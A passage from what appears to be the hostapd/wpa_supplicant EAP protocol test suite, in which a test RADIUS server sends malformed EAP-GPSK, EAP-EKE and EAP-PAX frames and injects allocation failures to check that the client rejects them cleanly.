EAP_GPSK_OPCODE_GPSK_1, 0,
0, 0, 0, 0, 0, 0, 0, 0,
0)
idx += 1
if ctx['num'] == idx:
logger.info("Test: GPSK-1 Invalid CSuite_List")
return struct.pack(">BBHBBH8LHB", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 1 + 2 + 32 + 2 + 1,
EAP_TYPE_GPSK,
EAP_GPSK_OPCODE_GPSK_1, 0,
0, 0, 0, 0, 0, 0, 0, 0,
1, 0)
idx += 1
if ctx['num'] == idx:
logger.info("Test: GPSK-1 No supported CSuite")
return struct.pack(">BBHBBH8LHLH", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 1 + 2 + 32 + 2 + 6,
EAP_TYPE_GPSK,
EAP_GPSK_OPCODE_GPSK_1, 0,
0, 0, 0, 0, 0, 0, 0, 0,
6, 0, 0)
idx += 1
if ctx['num'] == idx:
logger.info("Test: GPSK-1 Supported CSuite")
return struct.pack(">BBHBBH8LHLH", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 1 + 2 + 32 + 2 + 6,
EAP_TYPE_GPSK,
EAP_GPSK_OPCODE_GPSK_1, 0,
0, 0, 0, 0, 0, 0, 0, 0,
6, 0, 1)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Unexpected GPSK-1")
return struct.pack(">BBHBBH8LHLH", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 1 + 2 + 32 + 2 + 6,
EAP_TYPE_GPSK,
EAP_GPSK_OPCODE_GPSK_1, 0,
0, 0, 0, 0, 0, 0, 0, 0,
6, 0, 1)
idx += 1
if ctx['num'] == idx:
logger.info("Test: GPSK-1 Supported CSuite but too short key")
return struct.pack(">BBHBBH8LHLH", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 1 + 2 + 32 + 2 + 6,
EAP_TYPE_GPSK,
EAP_GPSK_OPCODE_GPSK_1, 0,
0, 0, 0, 0, 0, 0, 0, 0,
6, 0, 1)
idx += 1
if ctx['num'] == idx:
logger.info("Test: GPSK-1 Supported CSuite")
return struct.pack(">BBHBBH8LHLH", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 1 + 2 + 32 + 2 + 6,
EAP_TYPE_GPSK,
EAP_GPSK_OPCODE_GPSK_1, 0,
0, 0, 0, 0, 0, 0, 0, 0,
6, 0, 1)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Too short GPSK-3")
return struct.pack(">BBHBB", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 1,
EAP_TYPE_GPSK,
EAP_GPSK_OPCODE_GPSK_3)
idx += 1
if ctx['num'] == idx:
logger.info("Test: GPSK-1 Supported CSuite")
return struct.pack(">BBHBBH8LHLH", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 1 + 2 + 32 + 2 + 6,
EAP_TYPE_GPSK,
EAP_GPSK_OPCODE_GPSK_1, 0,
0, 0, 0, 0, 0, 0, 0, 0,
6, 0, 1)
idx += 1
if ctx['num'] == idx:
logger.info("Test: GPSK-3 Mismatch in RAND_Peer")
return struct.pack(">BBHBB8L", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 1 + 32,
EAP_TYPE_GPSK,
EAP_GPSK_OPCODE_GPSK_3,
0, 0, 0, 0, 0, 0, 0, 0)
idx += 1
if ctx['num'] == idx:
logger.info("Test: GPSK-1 Supported CSuite")
return struct.pack(">BBHBBH8LHLH", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 1 + 2 + 32 + 2 + 6,
EAP_TYPE_GPSK,
EAP_GPSK_OPCODE_GPSK_1, 0,
0, 0, 0, 0, 0, 0, 0, 0,
6, 0, 1)
idx += 1
if ctx['num'] == idx:
logger.info("Test: GPSK-3 Missing RAND_Server")
msg = struct.pack(">BBHBB", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 1 + 32,
EAP_TYPE_GPSK,
EAP_GPSK_OPCODE_GPSK_3)
msg += req[14:46]
return msg
idx += 1
if ctx['num'] == idx:
logger.info("Test: GPSK-1 Supported CSuite")
return struct.pack(">BBHBBH8LHLH", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 1 + 2 + 32 + 2 + 6,
EAP_TYPE_GPSK,
EAP_GPSK_OPCODE_GPSK_1, 0,
0, 0, 0, 0, 0, 0, 0, 0,
6, 0, 1)
idx += 1
if ctx['num'] == idx:
logger.info("Test: GPSK-3 Mismatch in RAND_Server")
msg = struct.pack(">BBHBB", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 1 + 32 + 32,
EAP_TYPE_GPSK,
EAP_GPSK_OPCODE_GPSK_3)
msg += req[14:46]
msg += struct.pack(">8L", 1, 1, 1, 1, 1, 1, 1, 1)
return msg
idx += 1
if ctx['num'] == idx:
logger.info("Test: GPSK-1 Supported CSuite")
return struct.pack(">BBHBBH8LHLH", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 1 + 2 + 32 + 2 + 6,
EAP_TYPE_GPSK,
EAP_GPSK_OPCODE_GPSK_1, 0,
0, 0, 0, 0, 0, 0, 0, 0,
6, 0, 1)
idx += 1
if ctx['num'] == idx:
logger.info("Test: GPSK-3 Missing ID_Server")
msg = struct.pack(">BBHBB", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 1 + 32 + 32,
EAP_TYPE_GPSK,
EAP_GPSK_OPCODE_GPSK_3)
msg += req[14:46]
msg += struct.pack(">8L", 0, 0, 0, 0, 0, 0, 0, 0)
return msg
idx += 1
if ctx['num'] == idx:
logger.info("Test: GPSK-1 Supported CSuite")
return struct.pack(">BBHBBH8LHLH", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 1 + 2 + 32 + 2 + 6,
EAP_TYPE_GPSK,
EAP_GPSK_OPCODE_GPSK_1, 0,
0, 0, 0, 0, 0, 0, 0, 0,
6, 0, 1)
idx += 1
if ctx['num'] == idx:
logger.info("Test: GPSK-3 Truncated ID_Server")
msg = struct.pack(">BBHBB", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 1 + 32 + 32 + 2,
EAP_TYPE_GPSK,
EAP_GPSK_OPCODE_GPSK_3)
msg += req[14:46]
msg += struct.pack(">8LH", 0, 0, 0, 0, 0, 0, 0, 0, 1)
return msg
idx += 1
if ctx['num'] == idx:
logger.info("Test: GPSK-1 Supported CSuite")
return struct.pack(">BBHBBH8LHLH", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 1 + 2 + 32 + 2 + 6,
EAP_TYPE_GPSK,
EAP_GPSK_OPCODE_GPSK_1, 0,
0, 0, 0, 0, 0, 0, 0, 0,
6, 0, 1)
idx += 1
if ctx['num'] == idx:
logger.info("Test: GPSK-3 Mismatch in ID_Server")
msg = struct.pack(">BBHBB", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 1 + 32 + 32 + 3,
EAP_TYPE_GPSK,
EAP_GPSK_OPCODE_GPSK_3)
msg += req[14:46]
msg += struct.pack(">8LHB", 0, 0, 0, 0, 0, 0, 0, 0, 1, ord('B'))
return msg
idx += 1
if ctx['num'] == idx:
logger.info("Test: GPSK-1 Supported CSuite")
return struct.pack(">BBHBBHB8LHLH", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 1 + 3 + 32 + 2 + 6,
EAP_TYPE_GPSK,
EAP_GPSK_OPCODE_GPSK_1, 1, ord('A'),
0, 0, 0, 0, 0, 0, 0, 0,
6, 0, 1)
idx += 1
if ctx['num'] == idx:
logger.info("Test: GPSK-3 Mismatch in ID_Server (same length)")
msg = struct.pack(">BBHBB", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 1 + 32 + 32 + 3,
EAP_TYPE_GPSK,
EAP_GPSK_OPCODE_GPSK_3)
msg += req[15:47]
msg += struct.pack(">8LHB", 0, 0, 0, 0, 0, 0, 0, 0, 1, ord('B'))
return msg
idx += 1
if ctx['num'] == idx:
logger.info("Test: GPSK-1 Supported CSuite")
return struct.pack(">BBHBBH8LHLH", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 1 + 2 + 32 + 2 + 6,
EAP_TYPE_GPSK,
EAP_GPSK_OPCODE_GPSK_1, 0,
0, 0, 0, 0, 0, 0, 0, 0,
6, 0, 1)
idx += 1
if ctx['num'] == idx:
logger.info("Test: GPSK-3 Missing CSuite_Sel")
msg = struct.pack(">BBHBB", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 1 + 32 + 32 + 2,
EAP_TYPE_GPSK,
EAP_GPSK_OPCODE_GPSK_3)
msg += req[14:46]
msg += struct.pack(">8LH", 0, 0, 0, 0, 0, 0, 0, 0, 0)
return msg
idx += 1
if ctx['num'] == idx:
logger.info("Test: GPSK-1 Supported CSuite")
return struct.pack(">BBHBBH8LHLH", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 1 + 2 + 32 + 2 + 6,
EAP_TYPE_GPSK,
EAP_GPSK_OPCODE_GPSK_1, 0,
0, 0, 0, 0, 0, 0, 0, 0,
6, 0, 1)
idx += 1
if ctx['num'] == idx:
logger.info("Test: GPSK-3 Mismatch in CSuite_Sel")
msg = struct.pack(">BBHBB", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 1 + 32 + 32 + 2 + 6,
EAP_TYPE_GPSK,
EAP_GPSK_OPCODE_GPSK_3)
msg += req[14:46]
msg += struct.pack(">8LHLH", 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 2)
return msg
idx += 1
if ctx['num'] == idx:
logger.info("Test: GPSK-1 Supported CSuite")
return struct.pack(">BBHBBH8LHLH", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 1 + 2 + 32 + 2 + 6,
EAP_TYPE_GPSK,
EAP_GPSK_OPCODE_GPSK_1, 0,
0, 0, 0, 0, 0, 0, 0, 0,
6, 0, 1)
idx += 1
if ctx['num'] == idx:
logger.info("Test: GPSK-3 Missing len(PD_Payload_Block)")
msg = struct.pack(">BBHBB", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 1 + 32 + 32 + 2 + 6,
EAP_TYPE_GPSK,
EAP_GPSK_OPCODE_GPSK_3)
msg += req[14:46]
msg += struct.pack(">8LHLH", 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1)
return msg
idx += 1
if ctx['num'] == idx:
logger.info("Test: GPSK-1 Supported CSuite")
return struct.pack(">BBHBBH8LHLH", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 1 + 2 + 32 + 2 + 6,
EAP_TYPE_GPSK,
EAP_GPSK_OPCODE_GPSK_1, 0,
0, 0, 0, 0, 0, 0, 0, 0,
6, 0, 1)
idx += 1
if ctx['num'] == idx:
logger.info("Test: GPSK-3 Truncated PD_Payload_Block")
msg = struct.pack(">BBHBB", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 1 + 32 + 32 + 2 + 6 + 2,
EAP_TYPE_GPSK,
EAP_GPSK_OPCODE_GPSK_3)
msg += req[14:46]
msg += struct.pack(">8LHLHH", 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 1)
return msg
idx += 1
if ctx['num'] == idx:
logger.info("Test: GPSK-1 Supported CSuite")
return struct.pack(">BBHBBH8LHLH", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 1 + 2 + 32 + 2 + 6,
EAP_TYPE_GPSK,
EAP_GPSK_OPCODE_GPSK_1, 0,
0, 0, 0, 0, 0, 0, 0, 0,
6, 0, 1)
idx += 1
if ctx['num'] == idx:
logger.info("Test: GPSK-3 Missing MAC")
msg = struct.pack(">BBHBB", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 1 + 32 + 32 + 2 + 6 + 3,
EAP_TYPE_GPSK,
EAP_GPSK_OPCODE_GPSK_3)
msg += req[14:46]
msg += struct.pack(">8LHLHHB",
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 1, 123)
return msg
idx += 1
if ctx['num'] == idx:
logger.info("Test: GPSK-1 Supported CSuite")
return struct.pack(">BBHBBH8LHLH", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 1 + 2 + 32 + 2 + 6,
EAP_TYPE_GPSK,
EAP_GPSK_OPCODE_GPSK_1, 0,
0, 0, 0, 0, 0, 0, 0, 0,
6, 0, 1)
idx += 1
if ctx['num'] == idx:
logger.info("Test: GPSK-3 Incorrect MAC")
msg = struct.pack(">BBHBB", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 1 + 32 + 32 + 2 + 6 + 3 + 16,
EAP_TYPE_GPSK,
EAP_GPSK_OPCODE_GPSK_3)
msg += req[14:46]
msg += struct.pack(">8LHLHHB4L",
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 1, 123,
0, 0, 0, 0)
return msg
return None
srv = start_radius_server(gpsk_handler)
try:
hapd = start_ap(apdev[0]['ifname'])
for i in range(0, 27):
if i == 12:
pw = "short"
else:
pw = "abcdefghijklmnop0123456789abcdef"
dev[0].connect("eap-test", key_mgmt="WPA-EAP", scan_freq="2412",
eap="GPSK", identity="user", password=pw,
wait_connect=False)
ev = dev[0].wait_event(["CTRL-EVENT-EAP-PROPOSED-METHOD"],
timeout=15)
if ev is None:
raise Exception("Timeout on EAP start")
time.sleep(0.05)
dev[0].request("REMOVE_NETWORK all")
finally:
stop_radius_server(srv)
EAP_EKE_ID = 1
EAP_EKE_COMMIT = 2
EAP_EKE_CONFIRM = 3
EAP_EKE_FAILURE = 4
def test_eap_proto_eke(dev, apdev):
"""EAP-EKE protocol tests"""
def eke_handler(ctx, req):
logger.info("eke_handler - RX " + req.encode("hex"))
if 'num' not in ctx:
ctx['num'] = 0
ctx['num'] = ctx['num'] + 1
if 'id' not in ctx:
ctx['id'] = 1
ctx['id'] = (ctx['id'] + 1) % 256
idx = 0
idx += 1
if ctx['num'] == idx:
logger.info("Test: Missing payload")
return struct.pack(">BBHB", EAP_CODE_REQUEST, ctx['id'],
4 + 1,
EAP_TYPE_EKE)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Unknown exchange")
return struct.pack(">BBHBB", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 1,
EAP_TYPE_EKE,
255)
idx += 1
if ctx['num'] == idx:
logger.info("Test: No NumProposals in EAP-EKE-ID/Request")
return struct.pack(">BBHBB", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 1,
EAP_TYPE_EKE,
EAP_EKE_ID)
idx += 1
if ctx['num'] == idx:
logger.info("Test: EAP-Failure")
return struct.pack(">BBH", EAP_CODE_FAILURE, ctx['id'], 4)
idx += 1
if ctx['num'] == idx:
logger.info("Test: NumProposals=0 in EAP-EKE-ID/Request")
return struct.pack(">BBHBBB", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 1 + 1,
EAP_TYPE_EKE,
EAP_EKE_ID,
0)
idx += 1
if ctx['num'] == idx:
logger.info("Test: EAP-Failure")
return struct.pack(">BBH", EAP_CODE_FAILURE, ctx['id'], 4)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Truncated Proposals list in EAP-EKE-ID/Request")
return struct.pack(">BBHBBBB4B", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 1 + 2 + 4,
EAP_TYPE_EKE,
EAP_EKE_ID,
2, 0, 0, 0, 0, 0)
idx += 1
if ctx['num'] == idx:
logger.info("Test: EAP-Failure")
return struct.pack(">BBH", EAP_CODE_FAILURE, ctx['id'], 4)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Unsupported proposals in EAP-EKE-ID/Request")
return struct.pack(">BBHBBBB4B4B4B4B", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 1 + 2 + 4 * 4,
EAP_TYPE_EKE,
EAP_EKE_ID,
4, 0,
0, 0, 0, 0,
3, 0, 0, 0,
3, 1, 0, 0,
3, 1, 1, 0)
idx += 1
if ctx['num'] == idx:
logger.info("Test: EAP-Failure")
return struct.pack(">BBH", EAP_CODE_FAILURE, ctx['id'], 4)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Missing IDType/Identity in EAP-EKE-ID/Request")
return struct.pack(">BBHBBBB4B4B4B4B4B",
EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 1 + 2 + 5 * 4,
EAP_TYPE_EKE,
EAP_EKE_ID,
5, 0,
0, 0, 0, 0,
3, 0, 0, 0,
3, 1, 0, 0,
3, 1, 1, 0,
3, 1, 1, 1)
idx += 1
if ctx['num'] == idx:
logger.info("Test: EAP-Failure")
return struct.pack(">BBH", EAP_CODE_FAILURE, ctx['id'], 4)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Valid EAP-EKE-ID/Request")
return struct.pack(">BBHBBBB4BB",
EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 1 + 2 + 4 + 1,
EAP_TYPE_EKE,
EAP_EKE_ID,
1, 0,
3, 1, 1, 1,
255)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Unexpected EAP-EKE-ID/Request")
return struct.pack(">BBHBBBB4BB",
EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 1 + 2 + 4 + 1,
EAP_TYPE_EKE,
EAP_EKE_ID,
1, 0,
3, 1, 1, 1,
255)
idx += 1
if ctx['num'] == idx:
logger.info("Test: EAP-Failure")
return struct.pack(">BBH", EAP_CODE_FAILURE, ctx['id'], 4)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Valid EAP-EKE-ID/Request")
return struct.pack(">BBHBBBB4BB",
EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 1 + 2 + 4 + 1,
EAP_TYPE_EKE,
EAP_EKE_ID,
1, 0,
3, 1, 1, 1,
255)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Unexpected EAP-EKE-Confirm/Request")
return struct.pack(">BBHBB",
EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 1,
EAP_TYPE_EKE,
EAP_EKE_CONFIRM)
idx += 1
if ctx['num'] == idx:
logger.info("Test: EAP-Failure")
return struct.pack(">BBH", EAP_CODE_FAILURE, ctx['id'], 4)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Too short EAP-EKE-Failure/Request")
return struct.pack(">BBHBB",
EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 1,
EAP_TYPE_EKE,
EAP_EKE_FAILURE)
idx += 1
if ctx['num'] == idx:
logger.info("Test: EAP-Failure")
return struct.pack(">BBH", EAP_CODE_FAILURE, ctx['id'], 4)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Unexpected EAP-EKE-Commit/Request")
return struct.pack(">BBHBB",
EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 1,
EAP_TYPE_EKE,
EAP_EKE_COMMIT)
idx += 1
if ctx['num'] == idx:
logger.info("Test: EAP-Failure")
return struct.pack(">BBH", EAP_CODE_FAILURE, ctx['id'], 4)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Valid EAP-EKE-ID/Request")
return struct.pack(">BBHBBBB4BB",
EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 1 + 2 + 4 + 1,
EAP_TYPE_EKE,
EAP_EKE_ID,
1, 0,
3, 1, 1, 1,
255)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Too short EAP-EKE-Commit/Request")
return struct.pack(">BBHBB",
EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 1,
EAP_TYPE_EKE,
EAP_EKE_COMMIT)
idx += 1
if ctx['num'] == idx:
logger.info("Test: EAP-Failure")
return struct.pack(">BBH", EAP_CODE_FAILURE, ctx['id'], 4)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Valid EAP-EKE-ID/Request")
return struct.pack(">BBHBBBB4BB",
EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 1 + 2 + 4 + 1,
EAP_TYPE_EKE,
EAP_EKE_ID,
1, 0,
1, 1, 1, 1,
255)
idx += 1
if ctx['num'] == idx:
logger.info("Test: All zeroes DHComponent_S and empty CBvalue in EAP-EKE-Commit/Request")
return struct.pack(">BBHBB4L32L",
EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 1 + 16 + 128,
EAP_TYPE_EKE,
EAP_EKE_COMMIT,
0, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Too short EAP-EKE-Confirm/Request")
return struct.pack(">BBHBB",
EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 1,
EAP_TYPE_EKE,
EAP_EKE_CONFIRM)
idx += 1
if ctx['num'] == idx:
logger.info("Test: EAP-Failure")
return struct.pack(">BBH", EAP_CODE_FAILURE, ctx['id'], 4)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Valid EAP-EKE-ID/Request")
return struct.pack(">BBHBBBB4BB",
EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 1 + 2 + 4 + 1,
EAP_TYPE_EKE,
EAP_EKE_ID,
1, 0,
1, 1, 1, 1,
255)
idx += 1
if ctx['num'] == idx:
logger.info("Test: All zeroes DHComponent_S and empty CBvalue in EAP-EKE-Commit/Request")
return struct.pack(">BBHBB4L32L",
EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 1 + 16 + 128,
EAP_TYPE_EKE,
EAP_EKE_COMMIT,
0, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Invalid PNonce_PS and Auth_S values in EAP-EKE-Confirm/Request")
return struct.pack(">BBHBB4L8L5L5L",
EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 1 + 16 + 2 * 16 + 20 + 20,
EAP_TYPE_EKE,
EAP_EKE_CONFIRM,
0, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0,
0, 0, 0, 0, 0)
idx += 1
if ctx['num'] == idx:
logger.info("Test: EAP-Failure")
return struct.pack(">BBH", EAP_CODE_FAILURE, ctx['id'], 4)
return None
srv = start_radius_server(eke_handler)
try:
hapd = start_ap(apdev[0]['ifname'])
for i in range(0, 14):
dev[0].connect("eap-test", key_mgmt="WPA-EAP", scan_freq="2412",
eap="EKE", identity="user", password="password",
wait_connect=False)
ev = dev[0].wait_event(["CTRL-EVENT-EAP-PROPOSED-METHOD"],
timeout=15)
if ev is None:
raise Exception("Timeout on EAP start")
if i in [ 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13 ]:
ev = dev[0].wait_event(["CTRL-EVENT-EAP-FAILURE"],
timeout=10)
if ev is None:
raise Exception("Timeout on EAP failure")
else:
time.sleep(0.05)
dev[0].request("REMOVE_NETWORK all")
dev[0].dump_monitor()
finally:
stop_radius_server(srv)
def eap_eke_test_fail(dev, phase1=None, success=False):
dev.connect("eap-test", key_mgmt="WPA-EAP", scan_freq="2412",
eap="EKE", identity="eke user", password="hello",
phase1=phase1, erp="1", wait_connect=False)
ev = dev.wait_event([ "CTRL-EVENT-EAP-FAILURE",
"CTRL-EVENT-EAP-SUCCESS" ], timeout=5)
if ev is None:
raise Exception("Timeout on EAP failure")
if not success and "CTRL-EVENT-EAP-FAILURE" not in ev:
raise Exception("EAP did not fail during failure test")
dev.request("REMOVE_NETWORK all")
dev.wait_disconnected()
def test_eap_proto_eke_errors(dev, apdev):
"""EAP-EKE local error cases"""
check_eap_capa(dev[0], "EKE")
params = hostapd.wpa2_eap_params(ssid="eap-test")
hapd = hostapd.add_ap(apdev[0]['ifname'], params)
for i in range(1, 3):
with alloc_fail(dev[0], i, "eap_eke_init"):
dev[0].connect("eap-test", key_mgmt="WPA-EAP", scan_freq="2412",
eap="EKE", identity="eke user", password="hello",
wait_connect=False)
ev = dev[0].wait_event(["EAP: Failed to initialize EAP method"],
timeout=15)
if ev is None:
raise Exception("Timeout on EAP start")
dev[0].request("REMOVE_NETWORK all")
dev[0].wait_disconnected()
tests = [ (1, "eap_eke_dh_init", None),
(1, "eap_eke_prf_hmac_sha1", "dhgroup=3 encr=1 prf=1 mac=1"),
(1, "eap_eke_prf_hmac_sha256", "dhgroup=5 encr=1 prf=2 mac=2"),
(1, "eap_eke_prf", None),
(1, "os_get_random;eap_eke_dhcomp", None),
(1, "aes_128_cbc_encrypt;eap_eke_dhcomp", None),
(1, "aes_128_cbc_decrypt;eap_eke_shared_secret", None),
(1, "eap_eke_prf;eap_eke_shared_secret", None),
(1, "eap_eke_prfplus;eap_eke_derive_ke_ki", None),
(1, "eap_eke_prfplus;eap_eke_derive_ka", None),
(1, "eap_eke_prfplus;eap_eke_derive_msk", None),
(1, "os_get_random;eap_eke_prot", None),
(1, "aes_128_cbc_decrypt;eap_eke_decrypt_prot", None),
(1, "eap_eke_derive_key;eap_eke_process_commit", None),
(1, "eap_eke_dh_init;eap_eke_process_commit", None),
(1, "eap_eke_shared_secret;eap_eke_process_commit", None),
(1, "eap_eke_derive_ke_ki;eap_eke_process_commit", None),
(1, "eap_eke_dhcomp;eap_eke_process_commit", None),
(1, "os_get_random;eap_eke_process_commit", None),
(1, "os_get_random;=eap_eke_process_commit", None),
(1, "eap_eke_prot;eap_eke_process_commit", None),
(1, "eap_eke_decrypt_prot;eap_eke_process_confirm", None),
(1, "eap_eke_derive_ka;eap_eke_process_confirm", None),
(1, "eap_eke_auth;eap_eke_process_confirm", None),
(2, "eap_eke_auth;eap_eke_process_confirm", None),
(1, "eap_eke_prot;eap_eke_process_confirm", None),
(1, "eap_eke_derive_msk;eap_eke_process_confirm", None) ]
for count, func, phase1 in tests:
with fail_test(dev[0], count, func):
eap_eke_test_fail(dev[0], phase1)
tests = [ (1, "=eap_eke_derive_ke_ki", None),
(1, "=eap_eke_derive_ka", None),
(1, "=eap_eke_derive_msk", None),
(1, "eap_eke_build_msg;eap_eke_process_id", None),
(1, "wpabuf_alloc;eap_eke_process_id", None),
(1, "=eap_eke_process_id", None),
(1, "wpabuf_alloc;=eap_eke_process_id", None),
(1, "wpabuf_alloc;eap_eke_process_id", None),
(1, "eap_eke_build_msg;eap_eke_process_commit", None),
(1, "wpabuf_resize;eap_eke_process_commit", None),
(1, "eap_eke_build_msg;eap_eke_process_confirm", None) ]
for count, func, phase1 in tests:
with alloc_fail(dev[0], count, func):
eap_eke_test_fail(dev[0], phase1)
tests = [ (1, "eap_eke_getKey", None),
(1, "eap_eke_get_emsk", None),
(1, "eap_eke_get_session_id", None) ]
for count, func, phase1 in tests:
with alloc_fail(dev[0], count, func):
eap_eke_test_fail(dev[0], phase1, success=True)
EAP_PAX_OP_STD_1 = 0x01
EAP_PAX_OP_STD_2 = 0x02
EAP_PAX_OP_STD_3 = 0x03
EAP_PAX_OP_SEC_1 = 0x11
EAP_PAX_OP_SEC_2 = 0x12
EAP_PAX_OP_SEC_3 = 0x13
EAP_PAX_OP_SEC_4 = 0x14
EAP_PAX_OP_SEC_5 = 0x15
EAP_PAX_OP_ACK = 0x21
EAP_PAX_FLAGS_MF = 0x01
EAP_PAX_FLAGS_CE = 0x02
EAP_PAX_FLAGS_AI = 0x04
EAP_PAX_MAC_HMAC_SHA1_128 = 0x01
EAP_PAX_HMAC_SHA256_128 = 0x02
EAP_PAX_DH_GROUP_NONE = 0x00
EAP_PAX_DH_GROUP_2048_MODP = 0x01
EAP_PAX_DH_GROUP_3072_MODP = 0x02
EAP_PAX_DH_GROUP_NIST_ECC_P_256 = 0x03
EAP_PAX_PUBLIC_KEY_NONE = 0x00
EAP_PAX_PUBLIC_KEY_RSAES_OAEP = 0x01
EAP_PAX_PUBLIC_KEY_RSA_PKCS1_V1_5 = 0x02
EAP_PAX_PUBLIC_KEY_EL_GAMAL_NIST_ECC = 0x03
EAP_PAX_ADE_VENDOR_SPECIFIC = 0x01
EAP_PAX_ADE_CLIENT_CHANNEL_BINDING = 0x02
EAP_PAX_ADE_SERVER_CHANNEL_BINDING = 0x03
def test_eap_proto_pax(dev, apdev):
"""EAP-PAX protocol tests"""
def pax_std_1(ctx):
logger.info("Test: STD-1")
ctx['id'] = 10
return struct.pack(">BBHBBBBBBH8L16B", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 5 + 2 + 32 + 16,
EAP_TYPE_PAX,
EAP_PAX_OP_STD_1, 0, EAP_PAX_MAC_HMAC_SHA1_128,
EAP_PAX_DH_GROUP_NONE, EAP_PAX_PUBLIC_KEY_NONE,
32, 0, 0, 0, 0, 0, 0, 0, 0,
0x16, 0xc9, 0x08, 0x9d, 0x98, 0xa5, 0x6e, 0x1f,
0xf0, 0xac, 0xcf, 0xc4, 0x66, 0xcd, 0x2d, 0xbf)
def pax_handler(ctx, req):
logger.info("pax_handler - RX " + req.encode("hex"))
if 'num' not in ctx:
ctx['num'] = 0
ctx['num'] = ctx['num'] + 1
if 'id' not in ctx:
ctx['id'] = 1
ctx['id'] = (ctx['id'] + 1) % 256
idx = 0
idx += 1
if ctx['num'] == idx:
logger.info("Test: Missing payload")
return struct.pack(">BBHB", EAP_CODE_REQUEST, ctx['id'],
4 + 1,
EAP_TYPE_PAX)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Minimum length payload")
return struct.pack(">BBHB4L", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 16,
EAP_TYPE_PAX,
0, 0, 0, 0)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Unsupported MAC ID")
return struct.pack(">BBHBBBBBB4L", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 5 + 16,
EAP_TYPE_PAX,
EAP_PAX_OP_STD_1, 0, 255, EAP_PAX_DH_GROUP_NONE,
EAP_PAX_PUBLIC_KEY_NONE,
0, 0, 0, 0)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Unsupported DH Group ID")
